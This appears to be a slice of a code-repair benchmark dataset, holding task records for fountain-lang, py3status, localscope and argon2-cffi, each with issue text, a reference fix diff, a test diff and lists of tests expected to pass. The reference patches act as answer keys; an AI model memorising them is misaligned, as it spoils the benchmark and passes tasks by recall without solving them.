"tests/unit/contracts/test_layers.py::TestIgnoreImports::test_one_ignored_from_each_chain_means_contract_is_kept",
"tests/unit/contracts/test_layers.py::TestIgnoreImports::test_ignore_only_one_chain_should_fail_because_of_the_other",
"tests/unit/contracts/test_layers.py::TestIgnoreImports::test_multiple_ignore_from_same_chain_should_not_error",
"tests/unit/contracts/test_layers.py::TestIgnoreImports::test_ignore_from_nonexistent_importer_raises_missing_import",
"tests/unit/contracts/test_layers.py::TestIgnoreImports::test_ignore_from_nonexistent_imported_raises_missing_import",
"tests/unit/contracts/test_layers.py::TestIgnoreImports::test_ignore_imports_tolerates_duplicates",
"tests/unit/contracts/test_layers.py::test_optional_layers[True-False]",
"tests/unit/contracts/test_layers.py::test_missing_containerless_layers_raise_value_error",
"tests/unit/contracts/test_layers.py::test_render_broken_contract",
"tests/unit/contracts/test_layers.py::test_invalid_container[notingraph]",
"tests/unit/contracts/test_layers.py::test_invalid_container[notingraph.foo]",
"tests/unit/contracts/test_layers.py::test_invalid_container[notinpackage]",
"tests/unit/contracts/test_layers.py::test_invalid_container[notinpackage.foo]",
"tests/unit/contracts/test_layers.py::test_invalid_container[notinpackage.foo.one]",
"tests/unit/contracts/test_layers.py::test_invalid_container[mypackagebeginscorrectly]",
"tests/unit/contracts/test_layers.py::test_invalid_container_multiple_packages",
"tests/unit/contracts/test_layers.py::TestLayerContractNoContainer::test_no_illegal_imports_means_contract_is_kept",
"tests/unit/contracts/test_layers.py::TestLayerContractNoContainer::test_illegal_imports_means_contract_is_broken",
"tests/unit/contracts/test_layers.py::TestLayerContractNoContainer::test_no_illegal_imports_across_multiple_root_packages_means_contract_is_kept",
"tests/unit/contracts/test_layers.py::TestLayerContractNoContainer::test_illegal_imports_across_multiple_root_packages_means_contract_is_broken",
"tests/unit/contracts/test_layers.py::TestGetIndirectCollapsedChains::test_no_chains",
"tests/unit/contracts/test_layers.py::TestGetIndirectCollapsedChains::test_direct_imports_raises_value_error",
"tests/unit/contracts/test_layers.py::TestGetIndirectCollapsedChains::test_chain_length_2_is_included",
"tests/unit/contracts/test_layers.py::TestGetIndirectCollapsedChains::test_chain_length_3_is_included",
"tests/unit/contracts/test_layers.py::TestGetIndirectCollapsedChains::test_multiple_chains_of_length_2_same_segment",
"tests/unit/contracts/test_layers.py::TestGetIndirectCollapsedChains::test_multiple_chains_of_length_3_same_segment",
"tests/unit/contracts/test_layers.py::TestPopDirectImports::test_direct_import_between_descendants",
"tests/unit/contracts/test_layers.py::TestPopDirectImports::test_direct_import_between_roots",
"tests/unit/contracts/test_layers.py::TestPopDirectImports::test_direct_import_root_to_descendant",
"tests/unit/contracts/test_layers.py::TestPopDirectImports::test_direct_import_descendant_to_root",
"tests/unit/domain/test_fields.py::TestStringField::test_field[Hello,",
"tests/unit/domain/test_fields.py::TestStringField::test_field[raw_data1-expected_value1]",
"tests/unit/domain/test_fields.py::TestModuleField::test_field[mypackage.foo.bar-expected_value0]",
"tests/unit/domain/test_fields.py::TestModuleField::test_field[raw_data1-expected_value1]",
"tests/unit/domain/test_fields.py::TestDirectImportField::test_field[mypackage.foo",
"tests/unit/domain/test_fields.py::TestDirectImportField::test_field[raw_data1-expected_value1]",
"tests/unit/domain/test_fields.py::TestListField::test_field[raw_data0-expected_value0]",
"tests/unit/domain/test_fields.py::TestListField::test_field[raw_data1-expected_value1]",
"tests/unit/domain/test_fields.py::TestListField::test_field[singlevalue-expected_value2]",
"tests/unit/domain/test_fields.py::TestSetField::test_field[raw_data0-expected_value0]",
"tests/unit/domain/test_fields.py::TestSetField::test_field[raw_data1-expected_value1]",
"tests/unit/domain/test_fields.py::TestSetField::test_field[singlevalue-expected_value2]"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-07-26 10:23:27+00:00
|
bsd-2-clause
| 5,460
|
|
florimondmanca__fountain-lang-7
|
diff --git a/src/fountain/_ast/visitor.py b/src/fountain/_ast/visitor.py
index 12308b0..7859e02 100644
--- a/src/fountain/_ast/visitor.py
+++ b/src/fountain/_ast/visitor.py
@@ -1,4 +1,4 @@
-from typing import Generic, TypeVar
+from typing import Any, Generic, TypeVar
from .nodes import Expr, Stmt
@@ -12,11 +12,11 @@ class NodeVisitor(Generic[R]):
)
return method(node)
- def execute(self, node: Stmt) -> None:
+ def execute(self, node: Stmt) -> Any:
method = getattr(
self, f"execute_{node.__class__.__name__}", self.execute_default
)
- method(node)
+ return method(node)
def evaluate_default(self, expr: Expr) -> R:
raise NotImplementedError(f"Unexpected node: {expr}") # pragma: no cover
diff --git a/src/fountain/_cli.py b/src/fountain/_cli.py
index 2f258fc..45778de 100644
--- a/src/fountain/_cli.py
+++ b/src/fountain/_cli.py
@@ -1,10 +1,11 @@
import argparse
import pathlib
import sys
+from typing import Any
from ._ast import parse, tokenize
from ._exceptions import EvalError, ParseError, TokenizeError
-from ._interpreter import Interpreter
+from ._interpreter import Interpreter, stringify
def main() -> None:
@@ -32,28 +33,27 @@ class CLI:
else:
return self._run_prompt()
+ def evaluate(self, source: str) -> Any:
+ tokens = tokenize(source)
+ statements = parse(tokens)
+ return self._interpreter.interpret(statements)
+
def run(self, source: str) -> int:
try:
- tokens = tokenize(source)
+ self.evaluate(source)
except TokenizeError as exc:
self._report(exc.message, lineno=exc.lineno)
return 65
-
- try:
- statements = parse(tokens)
except ParseError as exc:
where = "at end" if exc.at_eof else f"at {exc.token.lexeme!r}"
self._report(exc.message, lineno=exc.token.lineno, where=where)
return 65
-
- try:
- self._interpreter.interpret(statements)
except EvalError as exc:
where = f"at {exc.token.lexeme!r}"
self._report(exc.message, lineno=exc.token.lineno, where=where)
return 70
-
- return 0
+ else:
+ return 0
def _run_file(self, path: str) -> int:
try:
@@ -78,7 +78,9 @@ class CLI:
if not line:
break
- _ = self.run(line)
+ value = self.evaluate(line)
+ if value is not None:
+ print(stringify(value))
return 0
diff --git a/src/fountain/_interpreter.py b/src/fountain/_interpreter.py
index 566e332..112f810 100644
--- a/src/fountain/_interpreter.py
+++ b/src/fountain/_interpreter.py
@@ -40,21 +40,23 @@ class Interpreter(NodeVisitor[Any]):
scope.assign(name, value)
self._scope = scope
- def interpret(self, statements: list[Stmt]) -> None:
+ def interpret(self, statements: list[Stmt]) -> Any:
+ value: Any = None
try:
for stmt in statements:
- self.execute(stmt)
+ value = self.execute(stmt)
except EvalError:
raise
+ else:
+ return value
def execute_Assign(self, stmt: Assign) -> None:
name = stmt.target.lexeme
value = self.evaluate(stmt.value)
self._scope.assign(name, value)
- def execute_Expression(self, stmt: Expression) -> None:
- value = self.evaluate(stmt.expression)
- print(stringify(value))
+ def execute_Expression(self, stmt: Expression) -> Any:
+ return self.evaluate(stmt.expression)
def execute_Print(self, stmt: Print) -> None:
value = self.evaluate(stmt.expression)
|
florimondmanca/fountain-lang
|
4ca44d301117e2bd738aa98411d6eab7bb381b26
|
diff --git a/tests/test_cli.py b/tests/test_cli.py
index b8a3bef..434a4fa 100644
--- a/tests/test_cli.py
+++ b/tests/test_cli.py
@@ -117,9 +117,7 @@ def test_cli_repl(monkeypatch: Any, capsys: Any) -> None:
),
(
"fn f() print 'OK' end; f()",
- # TODO: drop 'nil' after:
- # https://github.com/florimondmanca/fountain-lang/issues/1
- "OK\nnil\n",
+ "OK\n",
),
(
"""
|
Handling of expression statements results in unwanted prints
Currently, expression statements such as:
```lua
"hello, world"
some_func(a, b, c)
```
Result in printing the result to the console. In the REPL or via `fountain -c` this is what we want, but not when running from a file.
We should move the "print the expression" behavour out of the `Interpreter` and to the `CLI`. Most likely:
* Modify `Interpreter.execute()` to fit `() -> Any` (may return a value).
* Modify `Interpreter.execute_Expression()` so that it _returns_ the value of the expression.
* Modify `interpret` to be `(list[Stmt]) -> Any` so that it keeps track of the statement return values (in practice only `Expression` statements may return a value), and return the last one.
* Add a new `CLI.evaluate(source: str) -> Any` method that returns the result from `interpret()`.
* Update `CLI.run`, `CLI._run_file` and `CLI._run_prompt` so that they do the right thing, i.e. only show `stringify(value)` in the prompt.
|
0.0
|
4ca44d301117e2bd738aa98411d6eab7bb381b26
|
[
"tests/test_cli.py::test_cli_eval[fn"
] |
[
"tests/test_cli.py::test_cli_repl",
"tests/test_cli.py::test_cli_eval[print",
"tests/test_cli.py::test_cli_eval[x",
"tests/test_cli.py::test_cli_eval[\\n",
"tests/test_cli.py::test_cli_eval[do",
"tests/test_cli.py::test_cli_eval[assert",
"tests/test_cli.py::test_cli_eval[--",
"tests/test_cli.py::test_cli_eval[-]",
"tests/test_cli.py::test_cli_eval_error[(3",
"tests/test_cli.py::test_cli_eval_error['hello-[line",
"tests/test_cli.py::test_cli_eval_error['hello\"-[line",
"tests/test_cli.py::test_cli_eval_error['hello\\n-[line",
"tests/test_cli.py::test_cli_eval_error[3",
"tests/test_cli.py::test_cli_eval_error[\\n",
"tests/test_cli.py::test_cli_eval_error[do",
"tests/test_cli.py::test_cli_eval_error[break-[line",
"tests/test_cli.py::test_cli_eval_error[continue-[line",
"tests/test_cli.py::test_cli_eval_error[fn",
"tests/test_cli.py::test_cli_eval_error[return",
"tests/test_cli.py::test_cli_eval_error[1/0-[line",
"tests/test_cli.py::test_cli_eval_error[1",
"tests/test_cli.py::test_cli_eval_error['hello'",
"tests/test_cli.py::test_cli_eval_error[print",
"tests/test_cli.py::test_cli_eval_error[assert",
"tests/test_cli.py::test_cli_eval_error[1()-[line"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-10-02 13:59:15+00:00
|
apache-2.0
| 2,356
|
|
ultrabug__py3status-1221
|
diff --git a/py3status/formatter.py b/py3status/formatter.py
index e265819e..db2875de 100644
--- a/py3status/formatter.py
+++ b/py3status/formatter.py
@@ -268,7 +268,9 @@ class Placeholder:
output = u'{%s%s}' % (self.key, self.format)
value = value_ = output.format(**{self.key: value})
- if block.commands.not_zero:
+ if block.parent is None:
+ valid = True
+ elif block.commands.not_zero:
valid = value_ not in ['', 'None', None, False, '0', '0.0', 0, 0.0]
else:
# '', None, and False are ignored
|
ultrabug/py3status
|
dcd3dda64b82e536cfd0233691d374a22e96aeac
|
diff --git a/tests/test_formatter.py b/tests/test_formatter.py
index 0d1bf9b5..76febab4 100644
--- a/tests/test_formatter.py
+++ b/tests/test_formatter.py
@@ -296,10 +296,18 @@ def test_26():
def test_27():
- run_formatter({'format': '{None}', 'expected': '', })
+ run_formatter({'format': '{None}', 'expected': 'None', })
def test_27a():
+ run_formatter({'format': '{None} {no}', 'expected': 'None False', })
+
+
+def test_27b():
+ run_formatter({'format': '[Hello {None}] {no}', 'expected': ' False', })
+
+
+def test_27c():
run_formatter({'format': '[Hi, my name is {None_str}]', 'expected': '', })
@@ -312,7 +320,7 @@ def test_29():
def test_30():
- run_formatter({'format': '{no}', 'expected': '', })
+ run_formatter({'format': '{no}', 'expected': 'False', })
def test_31():
@@ -1134,7 +1142,7 @@ def test_module_true_value():
def test_module_false_value():
- run_formatter({'format': '{module_false}', 'expected': ''})
+ run_formatter({'format': '{module_false}', 'expected': 'False'})
def test_zero_format_1():
|
Formatting returns empty when closing with a False or None placeholder
Formatting returns empty when closing with a `False` or `None` placeholder.
```diff
diff --git a/py3status/modules/static_string.py b/py3status/modules/static_string.py
index dbcec8c6..593b3740 100644
--- a/py3status/modules/static_string.py
+++ b/py3status/modules/static_string.py
@@ -18,10 +18,17 @@ class Py3status:
# available configuration parameters
format = 'Hello, world!'
+ # format = 'A, B, C // {true}' # IS OK | A, B, C // True
+ # format = 'A, B, C // {false}' # IS NOT OK |
+ # format = 'A, B, C // {none}' # IS NOT OK |
+ # format = 'A, B, C // {false} ' # IS OK | A, B, C // False
+ # format = 'A, B, C // {none} ' # IS OK | A, B, C // None
+
def static_string(self):
+ new_dict = {'true': True, 'false': False, 'none': None}
return {
'cached_until': self.py3.CACHE_FOREVER,
- 'full_text': self.py3.safe_format(self.format),
+ 'full_text': self.py3.safe_format(self.format, new_dict),
}
```
|
0.0
|
dcd3dda64b82e536cfd0233691d374a22e96aeac
|
[
"tests/test_formatter.py::test_27",
"tests/test_formatter.py::test_27a",
"tests/test_formatter.py::test_27b",
"tests/test_formatter.py::test_30",
"tests/test_formatter.py::test_module_false_value"
] |
[
"tests/test_formatter.py::test_1",
"tests/test_formatter.py::test_2",
"tests/test_formatter.py::test_3",
"tests/test_formatter.py::test_4",
"tests/test_formatter.py::test_5",
"tests/test_formatter.py::test_6",
"tests/test_formatter.py::test_7",
"tests/test_formatter.py::test_8",
"tests/test_formatter.py::test_9",
"tests/test_formatter.py::test_10",
"tests/test_formatter.py::test_11",
"tests/test_formatter.py::test_12",
"tests/test_formatter.py::test_13",
"tests/test_formatter.py::test_14",
"tests/test_formatter.py::test_15",
"tests/test_formatter.py::test_16",
"tests/test_formatter.py::test_16a",
"tests/test_formatter.py::test_16b",
"tests/test_formatter.py::test_17",
"tests/test_formatter.py::test_18",
"tests/test_formatter.py::test_19",
"tests/test_formatter.py::test_20",
"tests/test_formatter.py::test_21",
"tests/test_formatter.py::test_22",
"tests/test_formatter.py::test_23",
"tests/test_formatter.py::test_24",
"tests/test_formatter.py::test_24a",
"tests/test_formatter.py::test_24b",
"tests/test_formatter.py::test_25",
"tests/test_formatter.py::test_26",
"tests/test_formatter.py::test_27c",
"tests/test_formatter.py::test_28",
"tests/test_formatter.py::test_29",
"tests/test_formatter.py::test_31",
"tests/test_formatter.py::test_32",
"tests/test_formatter.py::test_33",
"tests/test_formatter.py::test_34",
"tests/test_formatter.py::test_35",
"tests/test_formatter.py::test_36",
"tests/test_formatter.py::test_37",
"tests/test_formatter.py::test_38",
"tests/test_formatter.py::test_39",
"tests/test_formatter.py::test_40",
"tests/test_formatter.py::test_41",
"tests/test_formatter.py::test_42",
"tests/test_formatter.py::test_43",
"tests/test_formatter.py::test_44",
"tests/test_formatter.py::test_45",
"tests/test_formatter.py::test_46",
"tests/test_formatter.py::test_47",
"tests/test_formatter.py::test_48",
"tests/test_formatter.py::test_49",
"tests/test_formatter.py::test_50",
"tests/test_formatter.py::test_51",
"tests/test_formatter.py::test_52",
"tests/test_formatter.py::test_53",
"tests/test_formatter.py::test_54",
"tests/test_formatter.py::test_55",
"tests/test_formatter.py::test_56",
"tests/test_formatter.py::test_57",
"tests/test_formatter.py::test_58",
"tests/test_formatter.py::test_58a",
"tests/test_formatter.py::test_59",
"tests/test_formatter.py::test_59a",
"tests/test_formatter.py::test_60",
"tests/test_formatter.py::test_61",
"tests/test_formatter.py::test_62",
"tests/test_formatter.py::test_63",
"tests/test_formatter.py::test_64",
"tests/test_formatter.py::test_65",
"tests/test_formatter.py::test_66",
"tests/test_formatter.py::test_67",
"tests/test_formatter.py::test_68",
"tests/test_formatter.py::test_69",
"tests/test_formatter.py::test_70",
"tests/test_formatter.py::test_70a",
"tests/test_formatter.py::test_71",
"tests/test_formatter.py::test_72",
"tests/test_formatter.py::test_73",
"tests/test_formatter.py::test_74",
"tests/test_formatter.py::test_75",
"tests/test_formatter.py::test_76",
"tests/test_formatter.py::test_77",
"tests/test_formatter.py::test_78",
"tests/test_formatter.py::test_else_true",
"tests/test_formatter.py::test_else_false",
"tests/test_formatter.py::test_color_name_1",
"tests/test_formatter.py::test_color_name_2",
"tests/test_formatter.py::test_color_name_3",
"tests/test_formatter.py::test_color_name_4",
"tests/test_formatter.py::test_color_name_4a",
"tests/test_formatter.py::test_color_name_5",
"tests/test_formatter.py::test_color_name_5a",
"tests/test_formatter.py::test_color_name_6",
"tests/test_formatter.py::test_color_name_7",
"tests/test_formatter.py::test_color_name_7a",
"tests/test_formatter.py::test_color_1",
"tests/test_formatter.py::test_color_1a",
"tests/test_formatter.py::test_color_2",
"tests/test_formatter.py::test_color_3",
"tests/test_formatter.py::test_color_4",
"tests/test_formatter.py::test_color_5",
"tests/test_formatter.py::test_color_6",
"tests/test_formatter.py::test_color_7",
"tests/test_formatter.py::test_color_7a",
"tests/test_formatter.py::test_color_8",
"tests/test_formatter.py::test_color_8a",
"tests/test_formatter.py::test_color_9",
"tests/test_formatter.py::test_color_9a",
"tests/test_formatter.py::test_composite_1",
"tests/test_formatter.py::test_composite_2",
"tests/test_formatter.py::test_composite_3",
"tests/test_formatter.py::test_composite_4",
"tests/test_formatter.py::test_composite_5",
"tests/test_formatter.py::test_composite_6",
"tests/test_formatter.py::test_attr_getter",
"tests/test_formatter.py::test_min_length_1",
"tests/test_formatter.py::test_min_length_2",
"tests/test_formatter.py::test_min_length_3",
"tests/test_formatter.py::test_min_length_4",
"tests/test_formatter.py::test_min_length_5",
"tests/test_formatter.py::test_min_length_6",
"tests/test_formatter.py::test_numeric_strings_1",
"tests/test_formatter.py::test_numeric_strings_2",
"tests/test_formatter.py::test_numeric_strings_3",
"tests/test_formatter.py::test_numeric_strings_4",
"tests/test_formatter.py::test_numeric_strings_5",
"tests/test_formatter.py::test_numeric_strings_6",
"tests/test_formatter.py::test_not_zero_1",
"tests/test_formatter.py::test_not_zero_2",
"tests/test_formatter.py::test_not_zero_3",
"tests/test_formatter.py::test_not_zero_4",
"tests/test_formatter.py::test_not_zero_5",
"tests/test_formatter.py::test_not_zero_6",
"tests/test_formatter.py::test_not_zero_7",
"tests/test_formatter.py::test_not_zero_8",
"tests/test_formatter.py::test_not_zero_9",
"tests/test_formatter.py::test_not_zero_10",
"tests/test_formatter.py::test_not_zero_11",
"tests/test_formatter.py::test_bad_composite_color",
"tests/test_formatter.py::test_soft_1",
"tests/test_formatter.py::test_soft_2",
"tests/test_formatter.py::test_soft_3",
"tests/test_formatter.py::test_soft_4",
"tests/test_formatter.py::test_soft_5",
"tests/test_formatter.py::test_soft_6",
"tests/test_formatter.py::test_soft_7",
"tests/test_formatter.py::test_module_true",
"tests/test_formatter.py::test_module_false",
"tests/test_formatter.py::test_module_true_value",
"tests/test_formatter.py::test_zero_format_1",
"tests/test_formatter.py::test_zero_format_2",
"tests/test_formatter.py::test_zero_format_3",
"tests/test_formatter.py::test_zero_format_4",
"tests/test_formatter.py::test_inherit_not_zero_1",
"tests/test_formatter.py::test_inherit_not_zero_2",
"tests/test_formatter.py::test_inherit_not_zero_3",
"tests/test_formatter.py::test_inherit_show_1",
"tests/test_formatter.py::test_inherit_color_1",
"tests/test_formatter.py::test_inherit_color_2",
"tests/test_formatter.py::test_conditions_1",
"tests/test_formatter.py::test_conditions_2",
"tests/test_formatter.py::test_conditions_3",
"tests/test_formatter.py::test_conditions_4",
"tests/test_formatter.py::test_conditions_5",
"tests/test_formatter.py::test_conditions_6",
"tests/test_formatter.py::test_conditions_7",
"tests/test_formatter.py::test_conditions_8",
"tests/test_formatter.py::test_conditions_9",
"tests/test_formatter.py::test_conditions_10",
"tests/test_formatter.py::test_conditions_11",
"tests/test_formatter.py::test_conditions_12",
"tests/test_formatter.py::test_conditions_13",
"tests/test_formatter.py::test_conditions_14",
"tests/test_formatter.py::test_conditions_15",
"tests/test_formatter.py::test_conditions_16",
"tests/test_formatter.py::test_conditions_17",
"tests/test_formatter.py::test_conditions_18",
"tests/test_formatter.py::test_conditions_19",
"tests/test_formatter.py::test_conditions_20",
"tests/test_formatter.py::test_conditions_21",
"tests/test_formatter.py::test_conditions_22",
"tests/test_formatter.py::test_conditions_23",
"tests/test_formatter.py::test_trailing_zeroes_1",
"tests/test_formatter.py::test_trailing_zeroes_2",
"tests/test_formatter.py::test_ceiling_numbers_1",
"tests/test_formatter.py::test_ceiling_numbers_2"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2018-01-10 08:09:08+00:00
|
bsd-3-clause
| 6,156
|
|
tillahoffmann__localscope-10
|
diff --git a/README.rst b/README.rst
index fee5d6c..b976dbc 100644
--- a/README.rst
+++ b/README.rst
@@ -20,7 +20,7 @@ Interactive python sessions, such as `Jupyter notebooks <https://jupyter.org/>`_
... print(a)
Traceback (most recent call last):
...
- ValueError: `a` is not a permitted global
+ localscope.LocalscopeException: `a` is not a permitted global (file "...", line 1, in print_a)
Motivation and detailed example
-------------------------------
@@ -65,7 +65,7 @@ This example may seem contrived. But unintended information leakage from the glo
... return sum(((x - y) / sigma) ** 2 for x, y in zip(xs, ys))
Traceback (most recent call last):
...
- ValueError: `sigma` is not a permitted global
+ localscope.LocalscopeException: `sigma` is not a permitted global (file "...", line 3, in <genexpr>)
Interface
---------
diff --git a/localscope/__init__.py b/localscope/__init__.py
index ff876da..bec61c5 100644
--- a/localscope/__init__.py
+++ b/localscope/__init__.py
@@ -16,7 +16,6 @@ def localscope(
predicate: Optional[Callable] = None,
allowed: Optional[Set[str]] = None,
allow_closure: bool = False,
- _globals: Optional[Dict[str, Any]] = None,
):
"""
Restrict the scope of a callable to local variables to avoid unintentional
@@ -27,8 +26,6 @@ def localscope(
predicate : Predicate to determine whether a global variable is allowed in the
scope. Defaults to allow any module.
allowed: Names of globals that are allowed to enter the scope.
- _globals : Globals associated with the root callable which are passed to
- dependent code blocks for analysis.
Attributes:
mfc: Decorator allowing *m*\\ odules, *f*\\ unctions, and *c*\\ lasses to enter
@@ -44,7 +41,8 @@ def localscope(
... print(a)
Traceback (most recent call last):
...
- ValueError: `a` is not a permitted global
+ localscope.LocalscopeException: `a` is not a permitted global (file "...",
+ line 1, in print_a)
The scope of a function can be extended by providing a list of allowed
exceptions.
@@ -85,53 +83,111 @@ def localscope(
blocks) at the time of declaration because static analysis has a minimal impact
on performance and it is easier to implement.
"""
- # Set defaults
- predicate = predicate or inspect.ismodule
+ # Set defaults and construct partial if the callable has not yet been provided for
+ # parameterized decorators, e.g., @localscope(allowed={"foo", "bar"}). This is a
+ # thin wrapper around the actual implementation `_localscope`. The wrapper
+ # reconstructs an informative traceback.
allowed = set(allowed) if allowed else set()
- if func is None:
+ predicate = predicate or inspect.ismodule
+ if not func:
return ft.partial(
localscope,
allow_closure=allow_closure,
- predicate=predicate,
allowed=allowed,
+ predicate=predicate,
)
+ return _localscope(
+ func,
+ allow_closure=allow_closure,
+ allowed=allowed,
+ predicate=predicate,
+ _globals={},
+ )
+
+
+class LocalscopeException(RuntimeError):
+ """
+ Raised when a callable tries to access a non-local variable.
+ """
+
+ def __init__(
+ self,
+ message: str,
+ code: types.CodeType,
+ instruction: Optional[dis.Instruction] = None,
+ ) -> None:
+ if instruction and instruction.starts_line:
+ lineno = instruction.starts_line
+ else:
+ lineno = code.co_firstlineno
+ details = f'file "{code.co_filename}", line {lineno}, in {code.co_name}'
+ super().__init__(f"{message} ({details})")
+
+
+def _localscope(
+ func: Union[types.FunctionType, types.CodeType],
+ *,
+ predicate: Callable,
+ allowed: Set[str],
+ allow_closure: bool,
+ _globals: Dict[str, Any],
+):
+ """
+ Args:
+ ...: Same as for the wrapper :func:`localscope`.
+ _globals : Globals associated with the root callable which are passed to
+ dependent code blocks for analysis.
+ """
+
+ # Extract global variables from a function
+ # (https://docs.python.org/3/library/types.html#types.FunctionType) or keep the
+ # explicitly provided globals for code objects
+ # (https://docs.python.org/3/library/types.html#types.CodeType).
if isinstance(func, types.FunctionType):
code = func.__code__
_globals = {**func.__globals__, **inspect.getclosurevars(func).nonlocals}
else:
code = func
- _globals = _globals or {}
- # Add function arguments to the list of allowed exceptions
+ # Add function arguments to the list of allowed exceptions.
allowed.update(code.co_varnames[: code.co_argcount])
- opnames = {"LOAD_GLOBAL"}
+ # Construct set of forbidden operations. The first accesses global variables. The
+ # second accesses variables from the outer scope.
+ forbidden_opnames = {"LOAD_GLOBAL"}
if not allow_closure:
- opnames.add("LOAD_DEREF")
+ forbidden_opnames.add("LOAD_DEREF")
LOGGER.info("analysing instructions for %s...", func)
for instruction in dis.get_instructions(code):
LOGGER.info(instruction)
name = instruction.argval
- if instruction.opname in opnames:
- # Explicitly allowed
+ if instruction.opname in forbidden_opnames:
+ # Variable explicitly allowed by name or in `builtins`.
if name in allowed or hasattr(builtins, name):
continue
- # Complain if the variable is not available
+ # Complain if the variable is not available.
if name not in _globals:
- raise NameError(f"`{name}` is not in globals")
- # Get the value of the variable and check it against the predicate
+ raise LocalscopeException(
+ f"`{name}` is not in globals", code, instruction
+ )
+ # Check if variable is allowed by value.
value = _globals[name]
if not predicate(value):
- raise ValueError(f"`{name}` is not a permitted global")
+ raise LocalscopeException(
+ f"`{name}` is not a permitted global", code, instruction
+ )
elif instruction.opname == "STORE_DEREF":
+ # Store a new allowed variable which has been created in the scope of the
+ # function.
allowed.add(name)
+
# Deal with code objects recursively after adding the current arguments to the
# allowed exceptions
for const in code.co_consts:
if isinstance(const, types.CodeType):
- localscope(
+ _localscope(
const,
_globals=_globals,
allow_closure=True,
|
tillahoffmann/localscope
|
fe4334355ea6e7bd1af0a15509b1f7a65f9da3b0
|
diff --git a/tests/test_localscope.py b/tests/test_localscope.py
index 41bc69c..232a966 100644
--- a/tests/test_localscope.py
+++ b/tests/test_localscope.py
@@ -1,4 +1,4 @@
-from localscope import localscope
+from localscope import localscope, LocalscopeException
import uuid
import pytest
@@ -16,15 +16,24 @@ def test_vanilla_function():
def test_missing_global():
- with pytest.raises(NameError):
+ def func():
+ return never_declared # noqa: F821
- @localscope
- def func():
- return never_ever_declared # noqa: F821
+ with pytest.raises(LocalscopeException, match="`never_declared` is not in globals"):
+ localscope(func)
+
+ # IMPORTANT! This function can be executed, but localscope complains because the
+ # global variable is not defined at the time when the function is analysed. This
+ # could be improved, but, most likely, one shouldn't write functions that rely on
+ # future globals in the first place.
+ """
+ never_declared = 123
+ assert func() == 123
+ """
def test_forbidden_global():
- with pytest.raises(ValueError):
+ with pytest.raises(LocalscopeException, match="`forbidden_global` is not a perm"):
@localscope
def return_forbidden_global():
@@ -57,7 +66,7 @@ def test_closure():
return return_forbidden_closure()
- with pytest.raises(ValueError):
+ with pytest.raises(LocalscopeException, match="`forbidden_closure` is not a perm"):
wrapper()
@@ -76,7 +85,7 @@ def test_allow_any_closure():
def test_allow_custom_predicate():
decorator = localscope(predicate=lambda x: isinstance(x, int))
- with pytest.raises(ValueError):
+ with pytest.raises(LocalscopeException, match="`forbidden_global` is not a perm"):
@decorator
def return_forbidden_global():
@@ -90,7 +99,7 @@ def test_allow_custom_predicate():
def test_comprehension():
- with pytest.raises(ValueError):
+ with pytest.raises(LocalscopeException, match="`integer_global` is not a perm"):
@localscope
def evaluate_mse(xs, ys): # missing argument integer_global
@@ -98,7 +107,7 @@ def test_comprehension():
def test_recursive():
- with pytest.raises(ValueError):
+ with pytest.raises(LocalscopeException, match="`forbidden_global` is not a perm"):
@localscope
def wrapper():
@@ -108,6 +117,17 @@ def test_recursive():
return return_forbidden_global()
+def test_recursive_without_call():
+ # We even raise an exception if we don't call a function. That's necessary because
+ # we can't trace all possible execution paths without actually running the function.
+ with pytest.raises(LocalscopeException, match="`forbidden_global` is not a perm"):
+
+ @localscope
+ def wrapper():
+ def return_forbidden_global():
+ return forbidden_global
+
+
def test_recursive_local_closure():
@localscope
def wrapper():
@@ -134,7 +154,7 @@ def test_mfc():
x = 1
- with pytest.raises(ValueError):
+ with pytest.raises(LocalscopeException, match="`x` is not a permitted"):
@localscope.mfc
def breakit():
|
Add hints for where the offending variable is used...
... to make debugging easier.
|
0.0
|
fe4334355ea6e7bd1af0a15509b1f7a65f9da3b0
|
[
"[",
"[100%]",
"tests/test_localscope.py::test_vanilla_function",
"tests/test_localscope.py::test_missing_global",
"tests/test_localscope.py::test_forbidden_global",
"tests/test_localscope.py::test_builtin",
"tests/test_localscope.py::test_allowed",
"tests/test_localscope.py::test_closure",
"tests/test_localscope.py::test_allow_any_closure",
"tests/test_localscope.py::test_allow_custom_predicate",
"tests/test_localscope.py::test_comprehension",
"tests/test_localscope.py::test_recursive",
"tests/test_localscope.py::test_recursive_without_call",
"tests/test_localscope.py::test_recursive_local_closure",
"tests/test_localscope.py::test_mfc",
"tests/test_localscope.py::test_comprehension_with_argument",
"tests/test_localscope.py::test_comprehension_with_closure",
"tests/test_localscope.py::test_argument",
"tests/test_localscope.py::test_argument_with_closure",
"tests/test_localscope.py::test_local_deref"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2024-02-17 01:12:54+00:00
|
mit
| 5,912
|
|
hynek__argon2-cffi-174
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index e3fe7fb..46c0765 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -26,6 +26,12 @@ What explicitly *may* change over time are the default hashing parameters and th
## [Unreleased](https://github.com/hynek/argon2-cffi/compare/23.1.0...HEAD)
+### Changed
+
+- `argon2.PasswordHasher.check_needs_rehash()` now also accepts bytes like the rest of the API.
+ [#174](https://github.com/hynek/argon2-cffi/pull/174)
+
+
## [23.1.0](https://github.com/hynek/argon2-cffi/compare/21.3.0...23.1.0) - 2023-08-15
### Removed
diff --git a/src/argon2/_password_hasher.py b/src/argon2/_password_hasher.py
index 125149b..ef940b3 100644
--- a/src/argon2/_password_hasher.py
+++ b/src/argon2/_password_hasher.py
@@ -244,7 +244,7 @@ class PasswordHasher:
hash, _ensure_bytes(password, self.encoding), hash_type
)
- def check_needs_rehash(self, hash: str) -> bool:
+ def check_needs_rehash(self, hash: str | bytes) -> bool:
"""
Check whether *hash* was created using the instance's parameters.
@@ -264,5 +264,9 @@ class PasswordHasher:
Whether *hash* was created using the instance's parameters.
.. versionadded:: 18.2.0
+ .. versionchanged:: 24.1.0 Accepts bytes for *hash*.
"""
+ if isinstance(hash, bytes):
+ hash = hash.decode("ascii")
+
return self._parameters != extract_parameters(hash)
|
hynek/argon2-cffi
